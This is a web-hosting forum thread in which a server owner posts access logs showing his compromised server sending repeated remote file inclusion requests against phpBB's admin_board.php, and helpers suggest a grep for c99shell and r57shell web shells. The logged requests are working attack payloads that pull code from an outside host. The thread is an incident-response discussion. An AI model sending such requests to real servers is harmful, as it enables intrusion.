Results 1 to 11 of 11
  1. #1

    My server attacks to another.How can I fix.?

    46.165.123.xxx - - [17/Nov/2006:04:12:17 -0500] "GET
    /admin/admin_board.php?phpbb_root_path=http://www.yyy.xxx/lol1.txt? HTTP/1.1" 403 1251 "-"
    "libwww-perl/5.76" (m........s.info) "-"
    46.165.123.xxx - - [17/Nov/2006:04:12:30 -0500] "GET
    /admin/admin_board.php?phpbb_root_path=http://www.xxx.xxx/lol1.txt? HTTP/1.1" 403 1251
    "-" "libwww-perl/5.76" (m........s.info) "-"
    46.165.123.xxx - - [17/Nov/2006:04:12:51 -0500] "GET
    /admin/admin_board.php?phpbb_root_path=http://www.xxx.xxx/lol1.txt? HTTP/1.1" 403 1251
    "-" "libwww-perl/5.76" (m........s.info) "-"
    46.165.123.xxx - - [17/Nov/2006:04:13:55 -0500] "GET
    /admin/admin_board.php?phpbb_root_path=http://www.yyy.xxx/lol1.txt? HTTP/1.1" 403 1251 "-"
    "libwww-perl/5.76" (m........s.info) "-"
    46.165.123.xxx - - [17/Nov/2006:04:14:16 -0500] "GET
    /admin/admin_board.php?phpbb_root_path=http://www.xxx.xxx/lol1.txt? HTTP/1.1" 403 1251
    "-" "libwww-perl/5.76" (m........s.info) "-"
    46.165.123.xxx - - [17/Nov/2006:04:15:04 -0500] "GET
    /admin/admin_board.php?phpbb_root_path=http://www.yyy.xxx/lol1.txt? HTTP/1.1" 403 1251 "-"
    "libwww-perl/5.76" (m........s.info) "-"
    46.165.123.xxx - - [17/Nov/2006:04:15:20 -0500] "GET
    /admin/admin_board.php?phpbb_root_path=http://www.xxx.xxx/lol1.txt? HTTP/1.1" 403 1251
    "-" "libwww-perl/5.76" (m........s.info) "-"
    46.165.123.xxx - - [17/Nov/2006:04:15:42 -0500] "GET
    /admin/admin_board.php?phpbb_root_path=http://www.xxx.xxx/lol1.txt? HTTP/1.1" 403 1251
    "-" "libwww-perl/5.76" (m........s.info) "-"
    46.165.123.xxx - - [17/Nov/2006:04:17:01 -0500] "GET
    /admin/admin_board.php?phpbb_root_path=http://www.xxx.xxx/lol1.txt? HTTP/1.1" 403 1251
    "-" "libwww-perl/5.76" (m........s.info) "-"
    46.165.123.xxx - - [17/Nov/2006:04:17:42 -0500] "GET
    /admin/admin_board.php?phpbb_root_path=http://www.xxx.xxx/lol1.txt? HTTP/1.1" 403 1251
    "-" "libwww-perl/5.76" (m........s.info) "-"
    46.165.123.xxx - - [17/Nov/2006:05:34:59 -0500] "GET
    /admin/admin_board.php?phpbb_root_path=http://www.yyy.xxx/lol1.txt? HTTP/1.1" 403 1251 "-"
    "libwww-perl/5.76" (m........s.info) "-"
    46.165.123.xxx - - [17/Nov/2006:05:35:20 -0500] "GET
    /admin/admin_board.php?phpbb_root_path=http://www.xxx.xxx/lol1.txt? HTTP/1.1" 403 1251
    "-" "libwww-perl/5.76" (m........s.info) "-"
    46.165.123.xxx - - [17/Nov/2006:05:36:35 -0500] "GET
    /admin/admin_board.php?phpbb_root_path=http://www.xxx.xxx/lol1.txt? HTTP/1.1" 403 1251
    "-" "libwww-perl/5.76" (m........s.info) "-"
    46.165.123.xxx - - [17/Nov/2006:05:36:50 -0500] "GET
    /admin/admin_board.php?phpbb_root_path=http://www.yyy.xxx/lol1.txt? HTTP/1.1" 403 1251 "-"
    "libwww-perl/5.76" (m........s.info) "-"
    46.165.123.xxx - - [17/Nov/2006:05:37:03 -0500] "GET
    /admin/admin_board.php?phpbb_root_path=http://www.xxx.xxx/lol1.txt? HTTP/1.1" 403 1251
    "-" "libwww-perl/5.76" (m........s.info) "-"
    46.165.123.xxx - - [17/Nov/2006:05:38:45 -0500] "GET
    /admin/admin_board.php?phpbb_root_path=http://www.yyy.xxx/lol1.txt? HTTP/1.1" 403 1251 "-"
    "libwww-perl/5.76" (m........s.info) "-"

    Hello.I am in a bad situation.Can you help me if you know the way of solution.
    Thank you very much for the times you gave.

  2. #2
    Join Date
    Nov 2006
    Location
    USA
    Posts
    762
    Might want to contact www.rack911.com

  3. #3
    Join Date
    Sep 2004
    Location
    Seoul, Korea (London, UK)
    Posts
    1,672
    You need to give more information, section of a log isn't going to tell so much.

    Only can see some involvement of a forum script (phpbb)

  4. #4
    Quote Originally Posted by The Engine
    You need to give more information, section of a log isn't going to tell so much.

    Only can see some involvement of a forum script (phpbb)
    Thank you very much for interest.


    I don't have more information.My DC sent me this log.And I just know the domains that's attacked.And The Ips.If you want I can send them.

    How can i find which domain has the phpbb that is dirty.There are some domains that has phpbb on my server.Do you think if I can understand the problem by scaning admin_board.php s of the phpbbs.

  5. #5
    Join Date
    Aug 2004
    Location
    France
    Posts
    405
    If this log was sent by your DC, I assume this is the log from the attacked server ? In this case, the phpbb is not on your server but you're probably hosting http://www.xxx.xxx/lol1.txt - unless 46.165.123.xxx is your server IP ?

    Some clarification would help
    Marie - Co-Owner
    Need Further Assistance ? Here you go !
    English, french and spanish support

  6. #6
    Quote Originally Posted by Yapluka
    If this log was sent by your DC, I assume this is the log from the attacked server ? In this case, the phpbb is not on your server but you're probably hosting http://www.xxx.xxx/lol1.txt - unless 46.165.123.xxx is your server IP ?

    Some clarification would help
    Hello.

    You are right about telling 46.165.123.xxx is mine and the logs from attacked server.But I am not hosting that websites.That's all I know.What do you think about the problem.I want to have your comments on this subject.

    Thanks a lot for your interests.

  7. #7
    Join Date
    Aug 2004
    Location
    France
    Posts
    405
    I would run a search for shell scripts like this, for example :

    Code:
    find /home/ -name "*.php" -print | xargs egrep -l 'c99shell|r57shell' >> /root/bad.txt
    This will paste the result of the search to the file /root/bad.txt

    Feel free to contact me if I can help in any way
    Marie - Co-Owner
    Need Further Assistance ? Here you go !
    English, french and spanish support

  8. #8
    Quote Originally Posted by Yapluka
    I would run a search for shell scripts like this, for example :

    Code:
    find /home/ -name "*.php" -print | xargs egrep -l 'c99shell|r57shell' >> /root/bad.txt
    This will paste the result of the search to the file /root/bad.txt

    Feel free to contact me if I can help in any way
    Thank you very much.It found some files.I deleted them.Do you think the problem has ended.

    I thought that the problem about phpbb.?

    What can I do for protecting like those shell scripts.?

  9. #9
    Join Date
    Aug 2004
    Location
    France
    Posts
    405
    phpbb is known as a vulnerable script and as such is targetted by a lot of kiddie scripts.
    If you found some shell scripts on your server, chances are they were used to connect to other servers and exploit some phpbb hosted there.

    You may want to look at the domlogs of the accounts where you found these bad files and see how they came in... then add some security to prevent them to come back.
    Marie - Co-Owner
    Need Further Assistance ? Here you go !
    English, french and spanish support

  10. #10
    Quote Originally Posted by Yapluka
    You may want to look at the domlogs of the accounts where you found these bad files and see how they came in... then add some security to prevent them to come back.
    I kept you busy I thank you replied all my questions.

    But I don't know how to do ting you said.Can you explain.?

  11. #11

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •